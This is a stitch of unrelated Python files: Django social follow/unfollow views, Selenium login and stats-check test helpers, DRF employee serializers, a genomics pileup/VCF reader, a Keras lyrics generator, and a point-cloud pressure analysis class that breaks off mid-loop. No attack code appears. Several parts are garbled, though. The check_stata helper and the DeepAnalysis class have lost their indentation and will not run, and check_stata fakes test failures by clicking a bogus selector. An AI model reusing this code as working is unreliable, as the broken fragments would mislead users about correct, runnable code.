    returns:
        'state_code'
'''
@require_http_methods(['POST'])
def follow(request):
    """Create a follow relationship from the current user to user `id`.

    State codes: 0 ok, 12 cannot follow yourself, 13 already following,
    otherwise the code from authentication().
    """
    ret = dict()
    auth = authentication(request,
                          required_param=['id'],
                          require_authenticate=True,
                          require_model=True,
                          model=User,
                          keytype='id')
    if not auth['state_code'] == 0:
        ret['state_code'] = auth['state_code']
    elif auth['record'].id == request.user.id:
        ret['state_code'] = 12
    else:
        target = auth['record']
        rel, created = Relationship.objects.get_or_create(
            from_user=request.user,
            to_user=target)
        if not created:
            ret['state_code'] = 13
        else:
            # BUG FIX: the original rebound `r` to the Relationship returned
            # by get_or_create and then evaluated r['record'] -- subscripting
            # a model instance raises TypeError on every successful follow.
            update_feature(request.user, target, False)
            ret['state_code'] = 0
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
unfollow:
    unfollow another user
    POST param
    ---------------------------------------------------------------------
    | param | introduction | default |
    |===================================================================|
    | id | id of user(followed) | REQUIRED |
    |===================================================================|
    returns:
        'state_code'
'''
@require_http_methods(['POST'])
def unfollow(request):
    """Delete the follow relationship from the current user to user `id`.

    State codes: 0 ok, 12 target is yourself, 14 not following,
    otherwise the code from authentication().
    """
    ret = dict()
    auth = authentication(request,
                          required_param=['id'],
                          require_authenticate=True,
                          require_model=True,
                          model=User,
                          keytype='id')
    if auth['state_code'] != 0:
        ret['state_code'] = auth['state_code']
    elif auth['record'].id == request.user.id:
        ret['state_code'] = 12
    else:
        links = Relationship.objects.filter(
            from_user=request.user,
            to_user=auth['record'])
        if len(links) == 0:
            ret['state_code'] = 14
        else:
            links.delete()
            ret['state_code'] = 0
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
check_following:
    check all following users with their state
    no params required
    returns:
        'state_code'
        'following' -- [{'id': id, 'name':name, 'state': state}]
'''
def check_following(request):
    """List every user the current user follows (easy-serialized)."""
    ret = dict()
    auth = authentication(request,
                          required_param=[],
                          require_authenticate=True)
    if auth['state_code'] != 0:
        ret['state_code'] = auth['state_code']
    else:
        followees = request.user.follow.filter(to_people__from_user=request.user)
        ret['following'] = [easy_serialize(u) for u in followees]
        ret['state_code'] = 0
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
check_follower:
    check all follower users
    no params required
    returns:
        'state_code'
        'follower' -- [{'id': id, 'name':name}]
'''
def check_follower(request):
    """List every user following the current user (easy-serialized)."""
    ret = dict()
    auth = authentication(request,
                          required_param=[],
                          require_authenticate=True)
    if auth['state_code'] != 0:
        ret['state_code'] = auth['state_code']
    else:
        ret['follower'] = [easy_serialize(u) for u in request.user.followed.all()]
        ret['state_code'] = 0
    return HttpResponse(json.dumps(ret), content_type='application/json')
'''
get_recommend:
    get recommend users and activities based on feature
'''
def get_recommend(request):
    # Returns the top-10 users and top-10 activities ranked by the comparator
    # from compare_construct(request.user); each entry also carries a
    # similarity() score between the candidate's `feature` and the current
    # user's `feature`.
    ret = dict()
    r = authentication(request,
                       required_param=[],
                       require_authenticate=True)
    if not r['state_code'] == 0:
        ret['state_code'] = r['state_code']
    else:
        ret['state_code'] = 0
        ret['users'] = []
        ret['acts'] = []
        # NOTE(review): sorts ALL users/activities per request with a Python
        # comparator -- fine for small tables, costly at scale. The current
        # user is presumably included in `users`; confirm whether it should
        # be excluded.
        users = sorted(User.objects.all(), reverse=True, key=cmp_to_key(compare_construct(request.user)))[0:10]
        activities = sorted(Activity.objects.all(), reverse=True, key=cmp_to_key(compare_construct(request.user)))[0:10]
        for u in users:
            ret['users'].append({'user': serialize(u), 'score': similarity(u.feature, request.user.feature)})
        for a in activities:
            # ret['acts'].append(serialize(a))
            ret['acts'].append({'act': serialize(a), 'score': similarity(a.feature, request.user.feature)})
    return HttpResponse(json.dumps(ret), content_type='application/json')
#-------------------------------------------------------------------
def testauthentication(request):
    """Debug endpoint exercising authentication() against an Activity id.

    Returns {'state_code', 'info' (serialized activity on success)}.
    """
    ret = dict()
    r = authentication(request,
                       required_param=['id'],
                       require_authenticate=True,
                       require_model=True,
                       # require_permission=True,
                       model=Activity,
                       keytype='id')
    if r['state_code'] == 0:
        # BUG FIX: the success branch never set 'state_code', so a successful
        # response omitted the field that every other view guarantees.
        ret['state_code'] = 0
        ret['info'] = activity_serialize(r['record'])
    else:
        ret['state_code'] = r['state_code']
    return HttpResponse(json.dumps(ret), content_type='application/json')
|
# coding: utf8
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import string
import datetime
import allure
import pytest
import requests
import selene
from selene import driver
from selene import tools
from selene.conditions import text, visible
from selene.api import *
import time
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from data import discount_error, discount, paypalLogin, paypalPass, mail, pwd, log_edp_ph, pass_edp, log_edp_ep, \
log_edp_ew, log_edp_pdn, log_edp_mae, log_edp_ee, log_edp_dw
from selenium import webdriver
from General_pages.order_steps import random_mail
from tools import scrollDown
# Today's date formatted as MM/DD/YYYY; module-level so the step helpers can
# locate "today's" row in the stats tables.
dt = datetime.datetime.now()
dt =dt.strftime("%m/%d/%Y")
dt=str(dt)
@allure.step('Выход из учетной записи')  # allure step: "Log out of the account"
def logout():
    """Open the account menu and click the logout link."""
    s(by.xpath('//div[@class="hello"]/span')).click()
    # Fixed sleeps to let the dropdown render / the logout complete.
    time.sleep(2)
    s(by.xpath('//a[@class="logout"]')).click()
    time.sleep(4)
@allure.step('Вход в учетную запись с параметрами')  # allure step: "Log in with parameters"
def login_edp(login, pwd):
    """Generic login: open the login page and submit the given credentials."""
    s(by.xpath('//a[@href="/login.html"]')).click()
    s('#login_login').set_value(login)
    s('#login_password').set_value(pwd)
    s('.login').click()
@allure.step('Вход в учетную записи для сайта PH')
def login_ph():
    """Log in with the PH-site credentials.

    Delegates to login_edp() instead of duplicating the four form steps
    (login_edp appears as a nested allure step in the report).
    """
    login_edp(log_edp_ph, pass_edp)
@allure.step('Вход в учетную записи для сайта EP')
def login_ep():
    """Log in with the EP-site credentials (delegates to login_edp)."""
    login_edp(log_edp_ep, pass_edp)
@allure.step('Вход в учетную записи для сайта EW')
def login_ew():
    """Log in with the EW-site credentials (delegates to login_edp)."""
    login_edp(log_edp_ew, pass_edp)
@allure.step('Вход в учетную записи для сайта PDN')
def login_pdn():
    """Log in with the PDN-site credentials (delegates to login_edp)."""
    login_edp(log_edp_pdn, pass_edp)
@allure.step('Вход в учетную записи для сайта DW')
def login_dw():
    """Log in with the DW-site credentials (delegates to login_edp)."""
    login_edp(log_edp_dw, pass_edp)
@allure.step('Вход в учетную записи для сайта MAE')
def login_mae():
    """Log in with the MAE-site credentials (delegates to login_edp)."""
    login_edp(log_edp_mae, pass_edp)
@allure.step('Вход в учетную записи для сайта EE')
def login_ee():
    """Log in with the EE-site credentials (delegates to login_edp)."""
    login_edp(log_edp_ee, pass_edp)
@allure.step('Переход во вкладку "Стата"')  # allure step: "Go to the 'Stats' tab"
def go_to_stata_tab():
    """Click the first item in the header menu (the stats tab)."""
    s(by.xpath('.//*[@id="header"]/div[2]/div/ul/li[1]/a')).click()
@allure.step('Проверка показателя статы на текущий день')
def check_stata():
time.sleep(5)
scrollDown()
dt = datetime.datetime.now()
dt = dt.strftime("%m/%d/%Y")
dt = str(dt)
print 'Current date is ' + dt
unik_field = s(by.xpath('//div[@class="table-stats-resp-con stats-block"]/div[2]/table[1]/tbody/tr/td[contains(text(), "{0}")]/../td[2]'.format(dt))).text
if unik_field == '1':
print 'Count unik ' + unik_field + " in " + dt
else:
print 'Error unik test ! Unik = ' + unik_field
s('. Error for unik').click()
bid_field = s(by.xpath('//div[@class="table-stats-resp-con stats-block"]/div[2]/table[1]/tbody/tr/td[contains(text(), "{0}")]/../td[3]'.format(dt))).text
if bid_field == '1':
print 'Count bid ' + bid_field + " in " + dt
else:
print 'Error bid test ! Bid = ' + bid_field
s('. Error for unik').click()
#bid = s(by.xpath('//div[@class="table-stats-resp-con stats-block"]/div[2]/table[1]/tbody/tr/td[contains(text(), "{0}")]/../td[3]'.format(dt))).text().assure('0') |
from rest_framework import serializers
from core.models import Employee
from authentication.serializers import UserSerializer
from api.v1.department.serializers import DepartmentSerializer
from api.v1.designation.serializers import DesignationSerializer
from api.v1.ifs.serializers import IfsSerializer
from api.v1.company.serializers import CompanySerializer
from api.v1.level.serializers import LevelSerializer
class EmployeeListSerializer(serializers.ModelSerializer):
    """Read serializer for Employee with all related records expanded.

    Nested serializers render the full related objects instead of PKs;
    everything except user/company is optional.
    """
    user = UserSerializer()
    company = CompanySerializer()
    ifs = IfsSerializer(required=False)
    level = LevelSerializer(required=False)
    department = DepartmentSerializer(required=False)
    designation = DesignationSerializer(required=False)
    class Meta:
        model = Employee
        fields = '__all__'
class EmployeeCreateSerializer(serializers.ModelSerializer):
    """Create serializer that also creates the nested auth user."""
    user = UserSerializer()
    class Meta:
        model = Employee
        fields = '__all__'
    def create(self, validated_data):
        """Create the nested user first, then the Employee pointing at it."""
        user_validated_data = validated_data.pop('user')
        # Delegate user creation to the nested field's serializer so its
        # own create() logic (e.g. password handling) is reused.
        user_set_serializer = self.fields['user']
        user = user_set_serializer.create(user_validated_data)
        employee = Employee.objects.create(user=user, **validated_data)
        return employee
class EmployeeUpdateSerializer(serializers.ModelSerializer):
    """Update serializer; plain PK-based fields, no nested user handling."""
    class Meta:
        model = Employee
        fields = '__all__'
|
import sys
from locus import Locus
from collections import Iterator
import numpy as np
class Pileup_file(Iterator):
    """Class implements an iterator
    of pileup file lines. Each line
    parsed and returned as a Locus
    object."""
    def __init__(self, filename=None):
        # Read from the named file, or fall back to stdin for pipelines.
        if filename:
            self.infile = open(filename, 'r')
        else:
            self.infile = sys.stdin
    def __iter__(self):
        #TODO: possibly unpredictable behaviour with stdin
        # Rewind so the file can be iterated more than once (stdin is not
        # seekable -- this will raise there).
        self.infile.seek(0)
        return self
    def __next__(self):
        # returns the next locus
        # Expected tab-separated layout: chrom, coord, ref_base, then
        # per-sample columns. At EOF readline() returns '' which splits to
        # [''], so line[1] raises IndexError and ends the iteration.
        try:
            line = self.infile.readline()
            line = line.replace('\n','')
            line = line.split('\t')
            chrom = line[0]
            coord = line[1]
            ref_base = line[2]
            sample_specific_data = line[3:]
        except IndexError:
            raise StopIteration
        return Locus(chrom, coord, ref_base, sample_specific_data)
class Amplification_matrix:
    """Either generates or loads from file
    a matrix of probabilities that any allele
    will be amplified from any genotype. This
    excludes the effect of allelic dropout"""
    def __init__(self, filename=None, fp_error=0):
        """Build the 4x4x4 amplification-probability matrix.

        filename -- optional CSV with 4 rows (one per intermediate allele k),
                    each holding 16 comma-separated values laid out as
                    column = 4*i + j for genotype (i, j).
        fp_error -- total false-positive probability spread evenly over the
                    three wrong alleles when generating the matrix.
        """
        # First two indices are genotype (symmetric), third is intermediate allele
        self.matrix = np.zeros((4,4,4))
        if filename is None:  # `is None`, not `== None` (PEP 8)
            for i in range(4):
                for j in range(4):
                    for k in range(4):
                        if i == j:
                            # Homozygous: the single true allele, minus the
                            # false-positive mass shared by the other three.
                            self.matrix[i,j,k] = 1 - fp_error if i == k else fp_error/3
                        else:
                            # Heterozygous: each true allele gets ~0.5; every
                            # slice over k still sums to 1.
                            self.matrix[i,j,k] = 0.5 - fp_error/3 if i == k or j == k else fp_error/3
        else:
            #TODO: test this reading ability
            f = open(filename, 'r')
            for k in range(4):
                line = f.readline().split(',')
                for col in range(len(line)):
                    # BUG FIX: np.floor(col/4) yields a float, which is not a
                    # valid NumPy index (raises IndexError on modern NumPy).
                    # Integer division gives the intended genotype row.
                    i = col // 4
                    j = col % 4
                    self.matrix[i,j,k] = line[col]
            f.close()
class VCF_file:
    #TODO test this unit
    """ Reads VCF file. Can be used to read
    germline mutations. """
    def __init__(self, filename=None):
        if filename:
            self.infile = open(filename, 'r')
        else:
            raise Exception("No VCF filename provided")
    def __iter__(self):
        # Rewind so the file can be iterated more than once.
        self.infile.seek(0)
        return self
    def __next__(self):
        # returns the next locus
        # Same tab-separated layout handling as Pileup_file: chrom, coord,
        # ref_base, then per-sample columns.
        try:
            line = self.infile.readline()
            line = line.replace('\n','')
            line = line.split('\t')
            chrom = line[0]
            coord = line[1]
            ref_base = line[2]
            sample_specific_data = line[3:]
        except IndexError:
            # BUG FIX: at EOF readline() returns '' -> [''] and line[1]
            # raised an uncaught IndexError; convert it to StopIteration so
            # `for locus in vcf:` terminates cleanly (matches Pileup_file).
            raise StopIteration
        return Locus(chrom, coord, ref_base, sample_specific_data)
|
import csv
from keras import backend as K
from keras.models import load_model
import numpy as np
import os
import sys
# inputs (command line): seed text, number of characters to generate,
# path to the trained Keras model, path to the charset CSV
model_input = sys.argv[1]
n_chars = int(sys.argv[2])
model_dir = sys.argv[3]
charset_file = sys.argv[4]
# to use GPU: pin TensorFlow to the first device
os.environ["CUDA_VISIBLE_DEVICES"]="0"
# verify that a gpu is listed (side effect only; result is discarded)
K.tensorflow_backend._get_available_gpus()
# Functions
def deprocessPrediction(ix_to_char, prediction):
    """Map a probability (or one-hot) vector back to its character.

    Picks the argmax index of *prediction* and looks it up in *ix_to_char*.
    """
    winner = np.argmax(prediction)
    return ix_to_char[winner]
def generateCharacterConverters(chars):
    """Build char->index and index->char lookups over sorted(chars)."""
    ordered = sorted(chars)
    char_to_ix = dict((ch, idx) for idx, ch in enumerate(ordered))
    ix_to_char = dict(enumerate(ordered))
    return char_to_ix, ix_to_char
def preprocessInput(char_to_ix, input, n_chars_set):
    """One-hot encode *input* as a float32 array of shape (1, len(input), n_chars_set).

    NOTE: the parameter name `input` shadows the builtin but is kept for
    interface compatibility.
    """
    sequence = list(input)
    encoded = np.zeros((1, len(sequence), n_chars_set), dtype='float32')
    for pos, ch in enumerate(sequence):
        encoded[0, pos, char_to_ix[ch]] = 1
    return encoded
def sample_predictions(preds, temperature=0.5):
    """Sample a one-hot vector from *preds* sharpened by *temperature*.

    Lower temperature makes the distribution peakier; returns the result
    of a single multinomial draw with shape (1, len(preds)).
    """
    scaled = np.log(np.asarray(preds).astype('float64')) / temperature
    weights = np.exp(scaled)
    weights = weights / np.sum(weights)
    return np.random.multinomial(1, weights, 1)
# Load Data: one character per row in the charset CSV (first column only).
with open(charset_file, 'r') as csv_file:
    reader = csv.reader(csv_file, delimiter=",")
    charset = []
    for row in reader:
        charset.append(row[0])
# Generate Charset Dictionaries
char_to_ix, ix_to_char = generateCharacterConverters(charset)
n_charset = len(charset)
# Load Model
model = load_model(model_dir)
# Generate a sequence from a sequence
# convert input to a sequence of one-hot encoded chars
preprocessed_input = preprocessInput(char_to_ix, model_input, n_charset)
result = model_input
for i in range(n_chars):
    # NOTE(review): assumes model.predict returns per-character probability
    # vectors for the window -- confirm against the training script.
    prediction = model.predict(preprocessed_input, verbose=0)[0]
    sampled_prediction = sample_predictions(prediction)
    next_char = deprocessPrediction(ix_to_char, sampled_prediction[0])
    # Slide the window one step left and append the sampled one-hot vector.
    preprocessed_input[0][:-1] = preprocessed_input[0][1:]
    preprocessed_input[0][-1] = sampled_prediction
    result += next_char
sys.stdout.write("\nRAD NEW 90s POP LYRICS")
sys.stdout.write("\n======================")
sys.stdout.write("\n\n")
sys.stdout.write(result)
sys.stdout.write("\n")
sys.stdout.write("\n======================\n") |
import os
class Names:
    """File names saved here with paths"""
    def __init__(self):
        # Case name -> directory holding that case's per-slice CSV point data.
        self.cases_dir = {"Mie02": "./data/zio/Mie_case02_retry_20200516_after_sorting/",
                          "Mie03": "./data/zio/Mie_case03_WL204_3rd_growing_after_sorting/",
                          "Mie02_10": "./data/zio/M02_10slices_zio/",
                          "Mie03_twin": "./data/zio/M03_2020_twins_zio_AS/",
                          "MI02": "./data/zio/MI02_WL266_ab_AS/"}
        # Case name -> pressure CSV file name.
        # NOTE(review): "Mie03" maps to the M02 pressure file -- confirm
        # this is intentional and not a copy-paste slip.
        self.pressure_file = {"Mie02": "M02_Pressure_100.csv",
                              "Mie02_10": "M02_Pressure_100.csv",
                              "Mie03": "M02_Pressure_100.csv"}
        # Case name -> format template for per-slice file names ({} = index).
        self.cases_name_rule = {"Mie02": "Mie_case02_{}.csv",
                                "Mie03": "MIe_case03_a_{}.csv",
                                "Mie02_10": "Mie_case02_{}.csv",
                                "Mie03_twin": "M03_2020_{}.csv",
                                "MI02": "MI02_WL266_ab_{}.csv"}
        # Case name -> cardiac cycle duration (presumably seconds -- verify).
        self.cases_cardio_circle = {"Mie02": 0.804,
                                    "Mie03": 0.804,
                                    "Mie02_10": 0.804}
        # Filled lazily by subclasses (case name -> pressure folder).
        self.cases_pressure_dir = {}
        # Output folder; replaced with "./<case>/" once a case is loaded.
        self.project_dir = "./unnamed_project/"
        try:
            os.makedirs(self.project_dir)
        except FileExistsError:
            pass
        self.data_name = ""        # currently loaded case name
        self.data = {}             # slice index -> {time step -> flat coords}
        self.movement_data = {}    # derived-output name -> file path
        self.point_number = 0      # total number of points across slices
class DataManager(Names):
    """Loads per-slice point-cloud CSVs for a case and provides viewing /
    mesh-export helpers on top of the path bookkeeping in Names."""
    def __init__(self):
        super().__init__()
        pass
    def load_data(self, data_name):
        """Load every slice CSV of *data_name* into self.data.

        self.data[slice_index][time_step] = flat list of coordinate strings
        (row columns from index 2 onward). Header row (step 0) is skipped.
        """
        import os
        import csv
        import re
        self.data_name = data_name
        # load point_cloud data
        # Slice index is the trailing number in each file name, e.g. "..._7.csv".
        find_index = re.compile(r"([0-9]+).csv", re.S)
        data = os.listdir(self.cases_dir[data_name])
        direction = self.cases_dir[data_name]
        for item in data:
            index = int(re.findall(find_index, item)[0])
            self.data[index] = {}
            with open(direction + item, "r") as file:
                csv_reader = csv.reader(file)
                for step, row in enumerate(csv_reader):
                    if step == 0:
                        continue  # skip header row
                    self.data[index][step - 1] = row[2:]
        # call load_output to refresh present states
        self.load_output()
        self.load_point_number()
    def load_output(self):
        """Point project_dir at ./<case>/ and index any existing output CSVs
        into self.movement_data (file stem -> path)."""
        # load output data
        self.project_dir = "./" + self.data_name + "/"
        try:
            os.makedirs(self.project_dir)
        except FileExistsError:
            pass
        files = os.listdir(self.project_dir)
        # no data found
        # NOTE(review): os.listdir never returns None (it returns []), so the
        # `is None` branch is dead -- the else always runs.
        if files is None:
            pass
        # normal load data
        else:
            for file in files:
                self.movement_data[file[:-4]] = self.project_dir + "/" + file
    def load_point_number(self):
        """Sum the point counts of all slices (3 coordinates per point).

        Assumes slice indices are contiguous 1..N -- TODO confirm for every
        case directory."""
        # load point number
        for i in range(1, len(self.data.keys()) + 1):
            self.point_number += len(self.data[i][0]) / 3
        self.point_number = int(self.point_number)
    def show(self, time_index):
        """Render the full point cloud at *time_index* in an Open3D window."""
        import numpy as np
        import open3d as o3d
        slices = list(self.data.keys())
        point_data = []
        for i in slices:
            data_slice = self.data[i][time_index]
            point_number = int(len(data_slice) // 3)
            for j in range(point_number):
                point_data.append(data_slice[j * 3:j * 3 + 3])
        point_cloud = np.array(point_data)
        pcd = o3d.geometry.PointCloud()
        pcd.points = o3d.utility.Vector3dVector(point_cloud[:, :3])
        o3d.visualization.draw_geometries([pcd])
    def create_ply(self, time_index, name="p_mesh_c{}.ply", crop=True):
        """Poisson-reconstruct a mesh from the cloud at *time_index* and write
        it to ./mesh/<case>/<name> (optionally cropped to the cloud's bbox).

        Normals are approximated as rays from the cloud centroid -- crude, but
        sufficient for Poisson reconstruction orientation."""
        import numpy as np
        import open3d as o3d
        try:
            os.makedirs("./mesh/" + self.data_name)
        except FileExistsError:
            pass
        slices = list(self.data.keys())
        point_data = []
        for i in slices:
            data_slice = self.data[i][time_index]
            point_number = int(len(data_slice) // 3)
            for j in range(point_number):
                point_data.append(data_slice[j * 3:j * 3 + 3])
        point_cloud = np.array(point_data, dtype=np.float32)
        point_position = []
        for item in point_cloud:
            point_position.append(item[:3])
        # Centroid of the cloud, used as the origin for the fake normals.
        x_, y_, z_ = 0, 0, 0
        for item in point_position:
            x_ += item[0]
            y_ += item[1]
            z_ += item[2]
        x_ /= point_cloud.shape[0]
        y_ /= point_cloud.shape[0]
        z_ /= point_cloud.shape[0]
        middle = np.array([x_, y_, z_])
        normal_vectors = []
        for item in point_position:
            normal = item - middle
            normal_vectors.append(normal)
        pcd = o3d.geometry.PointCloud()
        pcd.points = o3d.utility.Vector3dVector(point_cloud[:, :3])
        pcd.normals = o3d.utility.Vector3dVector(normal_vectors[:])  # fake normals with low accu
        poisson_mesh = \
            o3d.geometry.TriangleMesh.create_from_point_cloud_poisson(pcd, depth=8, width=0, scale=1.1,
                                                                      linear_fit=False)[0]
        bbox = pcd.get_axis_aligned_bounding_box()
        p_mesh_crop = poisson_mesh.crop(bbox)
        if crop is True:
            o3d.io.write_triangle_mesh("./mesh/" + self.data_name + "/" + name.format(time_index), p_mesh_crop)
        else:
            o3d.io.write_triangle_mesh("./mesh/" + self.data_name + "/" + name.format(time_index),
                                       poisson_mesh)  # a method not cropping the mesh
# Done
class Analysis(DataManager):
    """DataManager plus plotting and motion-derivative computation."""
    def __init__(self, data_name=None):
        # Loading is optional: without a case name only usage hints print.
        super().__init__()
        if data_name is None:
            print('Try "Analysis(data name)"')
            print("Or try '.load_data(data name)'")
        else:
            self.load_data(data_name)
    def show_data(self, datatype):
        """Plot a previously computed output CSV (keyed by file stem)."""
        print("Here is DataManager.Analysis.show_data!")
        import Viewer
        # Refresh movement_data so freshly written outputs are visible.
        self.load_output()
        try:
            data = self.movement_data[datatype]
            print(data)
            Viewer.plot(data)
        except KeyError:
            print("File {}.csv not found, unable to process!".format(datatype))
            pass
    def calculate_data(self, activated=1234567):
        """Run preprocessing and the forward-difference solver for this case.

        `activated` presumably encodes which computation steps to run --
        TODO confirm against starter_forward_difference.main().
        """
        print("Here is DataManager.Analysis.calculate_data!")
        import preprocess
        import starter_forward_difference
        file_path = self.cases_dir[self.data_name]
        cardio_circle = self.cases_cardio_circle[self.data_name]
        output_dir = self.project_dir
        name_rule = self.cases_name_rule[self.data_name]
        preprocess.preprocess(file_path)
        starter_forward_difference.main(file_path, activated, cardio_circle, output_dir, name_rule)
        pass
class DeepAnalysis(Analysis):
def __init__(self, data_name=None):
super().__init__(data_name)
self.plot_data = {"time": None,
"slices": [key for key in self.data.keys()],
"type": None}
self.dataset = {"point": None,
"normal": None,
"pressure": None,
"m": None,
"mu": None,
"k": None}
self.full_dataset = {"point": None,
"normal": None,
"pressure": None,
"m": None,
"mu": None,
"k": None,
"data": {}}
self.pressure = {}
self.purified_pressure = {}
self.load_pressure()
self.ode_data_x = []
self.ode_data_y = []
self.ode_data_z = []
self.ode_data_norm = []
self.ode_data_chen = []
def load_pressure(self):
"""load pressure data"""
try:
assert self.data_name != ""
except AssertionError:
print("Failed to init...")
print("Case name is indispensable for DeepAnalysis!")
return
import os
import csvreader
try:
self.cases_pressure_dir[self.data_name] = "./data/pressure/" + self.data_name
os.listdir(self.cases_pressure_dir[self.data_name])
assert os.listdir(self.cases_pressure_dir[self.data_name]) is not []
except FileNotFoundError:
print("Pressure folder not found, generating files...")
csvreader.convert_file(self.data_name, self.pressure_file[self.data_name])
except AssertionError:
print("Pressure folder is empty, generating files...")
csvreader.convert_file(self.data_name, self.pressure_file[self.data_name])
pressure_files = os.listdir(self.cases_pressure_dir[self.data_name])
for pressure_file in pressure_files:
self.pressure[int(float(pressure_file[:-4]) * 100) / 100] = \
self.cases_pressure_dir[self.data_name] + "/" + pressure_file
pass
def purify_pressure(self, time_step=None):
if time_step is None:
time_step = [i for i in range(100)]
import starter
# starter.solve(solver="pressure_purifier.pyw", time_step=time_step,
# case_name=self.data_name, slices=list(self.data.keys()),
# case_dir=self.cases_dir[self.data_name], pressure=self.pressure, background="bear")
starter.solve(solver="distance_clip_pressure_purifier.pyw", time_step=time_step,
case_name=self.data_name, slices=list(self.data.keys()),
case_dir=self.cases_dir[self.data_name], pressure=self.pressure, background="bear")
pass
def advanced_show(self, **kwargs):
"""**kwargs = [time=0, slices=[1,2,3], type=[pressure, m, mu, k,...]]"""
print("Here is DataManager.Analysis.DeepAnalysis.advanced_show!")
import csv
import random
for keyword in kwargs.keys():
self.plot_data[keyword] = kwargs[keyword]
time = "-" + str(self.plot_data["time"]) + "-"
slices = "-" + str(self.plot_data["slices"][0]) + "-" + str(self.plot_data["slices"][-1]) + "-"
type_ = "-"
for i in self.plot_data["type"]:
type_ += str(i)
type_ += "-"
with open(self.project_dir + "time{}_slice{}_type{}.csv".format(time, slices, type_), "w", newline="") as file:
csv_writer = csv.writer(file)
data = []
for item in self.plot_data["slices"]:
raw_points = self.data[item][self.plot_data["time"]]
for i in range(len(raw_points) // 3):
temp = raw_points[i * 3:i * 3 + 3]
temp.append(random.random()) # TODO show specific data, now use random as a test
data.append(temp)
for row in data:
csv_writer.writerow(row)
file.close()
self.show_data("time{}_slice{}_type{}".format(time, slices, type_))
pass
    def analysis_ode(self, model="a"):
        """Fit per-point ODE coefficients from purified pressure data by least squares.

        model="a":  one unknown per axis, relating |acceleration| to |pressure force|.
        model="av": two unknowns per axis (acceleration term plus a velocity term).
        Results are written to ./<data_name>/m-*.csv via the nested save_data().
        """
        print("Here is DataManager.Analysis.DeepAnalysis.analysis_ode!")
        print("Using model {}".format(model))
        # Per-axis, per-norm and combined ("chen") coefficient accumulators.
        self.ode_data_x = []
        self.ode_data_y = []
        self.ode_data_z = []
        self.ode_data_norm = []
        self.ode_data_chen = []
        t = 0.01  # time between consecutive frames -- TODO confirm units
        import numpy as np
        import os
        import csv
        # Index each purified CSV by the float time encoded in its file name
        # (name without the 4-char extension).
        for file in os.listdir("./data/pressure/" + self.data_name + "_purified/"):
            self.purified_pressure[float(file[:-4])] = "./data/pressure/" + self.data_name + "_purified/" + file
        data_index = list(self.purified_pressure.keys())
        data_index.sort()
        # Load every time step as a float32 array; rows appear to be
        # [x, y, z, pressure, nx, ny, nz] given the slicing below -- TODO confirm.
        for step in range(len(data_index)):
            data = []
            with open(self.purified_pressure[data_index[step]], "r") as f:
                csv_reader = csv.reader(f)
                for row in csv_reader:
                    data.append(row)
                f.close()  # redundant inside `with`, kept as written
            self.full_dataset["data"][step] = np.array(data, dtype=np.float32)

        def save_data(ode_data, name):
            # Write one row per point: [x, y, z, coefficient(s)...].
            import csv
            base_data = self.full_dataset["data"][0][:, :3]
            with open("./" + self.data_name + "/{}.csv".format(name), "w", newline="") as f:
                csv_writer = csv.writer(f)
                for row_ in zip(base_data, ode_data):
                    # Flatten the (xyz, coeffs) pair into one flat float row.
                    row_ = [float(item) for sublist in row_ for item in sublist]
                    csv_writer.writerow(row_)
                f.close()  # redundant inside `with`, kept as written

        if model == "a":
            # NOTE(review): the last 100 points and sizes hard-coded to 98 rows
            # assume a fixed number of time steps -- confirm against the data.
            for index in range(self.point_number - 100):
                Ax = np.zeros([98, 1])
                Bx = np.zeros([98, 1])
                Ay = np.zeros([98, 1])
                By = np.zeros([98, 1])
                Az = np.zeros([98, 1])
                Bz = np.zeros([98, 1])
                A = np.zeros([98, 1])
                B = np.zeros([98, 1])
                for time_step in range(len(self.purified_pressure.keys()) - 2):
                    # Three consecutive positions of the same point.
                    point_cloud1 = self.full_dataset["data"][time_step][index, :3]
                    point_cloud2 = self.full_dataset["data"][time_step + 1][index, :3]
                    point_cloud3 = self.full_dataset["data"][time_step + 2][index, :3]
                    pressure = self.full_dataset["data"][time_step + 1][index, 3] * 0.0001
                    normal = self.full_dataset["data"][time_step + 1][index, 4:]
                    # pressure assumed to have the same direction as the acceleration
                    dx1 = point_cloud2 - point_cloud1
                    dx2 = point_cloud3 - point_cloud2
                    dx = 0.5 * (dx1 + dx2)
                    v = dx / t  # central-difference velocity
                    a_ = (dx2 - dx1) / t ** 2  # second-difference acceleration
                    Ax[time_step, 0] = abs(a_[0])
                    Bx[time_step] = abs(pressure * normal[0])
                    Ay[time_step, 0] = abs(a_[1])
                    By[time_step] = abs(pressure * normal[1])
                    Az[time_step, 0] = abs(a_[2])
                    Bz[time_step] = abs(pressure * normal[2])
                    A[time_step, 0] = np.linalg.norm(a_) * 1
                    B[time_step] = np.linalg.norm(pressure * normal @ (a_ / np.linalg.norm(a_)))
                    # A[time_step, 1] = np.linalg.norm(v) * ((a_ / np.linalg.norm(a_)) @ (v / np.linalg.norm(v)))
                    # A[time_step, 2] = np.linalg.norm(dx) * ((a_ / np.linalg.norm(a_)) @ (dx / np.linalg.norm(dx)))
                # Normal-equation least squares per axis: (A^T A) x = A^T b.
                ans_x = np.linalg.solve(Ax.T @ Ax, Ax.T @ Bx)
                self.ode_data_x.append([float(ans_x[0])])  # , float(ans_x[1])])
                ans_y = np.linalg.solve(Ay.T @ Ay, Ay.T @ By)
                self.ode_data_y.append([float(ans_y[0])])  # , float(ans_y[1])])
                ans_z = np.linalg.solve(Az.T @ Az, Az.T @ Bz)
                self.ode_data_z.append([float(ans_z[0])])  # , float(ans_z[1])])
                self.ode_data_norm.append([np.sqrt(
                    ans_x[0] ** 2 + ans_y[0] ** 2 + ans_z[0] ** 2)])  # , np.sqrt(ans_x[1]**2+ans_y[1]**2+ans_z[1]**2)])
                ans_chen = np.linalg.solve(A.T @ A, A.T @ B)
                self.ode_data_chen.append([float(ans_chen[0])])
            save_data(self.ode_data_x, "m-x")
            save_data(self.ode_data_y, "m-y")
            save_data(self.ode_data_z, "m-z")
            save_data(self.ode_data_norm, "m-norm")
            save_data(self.ode_data_chen, "m-norm-c")
            pass
        elif model == "av":
            # Same structure but with a second column for the velocity term.
            for index in range(self.point_number - 100):
                Ax = np.zeros([98, 2])
                Bx = np.zeros([98, 1])
                Ay = np.zeros([98, 2])
                By = np.zeros([98, 1])
                Az = np.zeros([98, 2])
                Bz = np.zeros([98, 1])
                A = np.zeros([98, 2])
                B = np.zeros([98, 1])
                for time_step in range(len(self.purified_pressure.keys()) - 2):
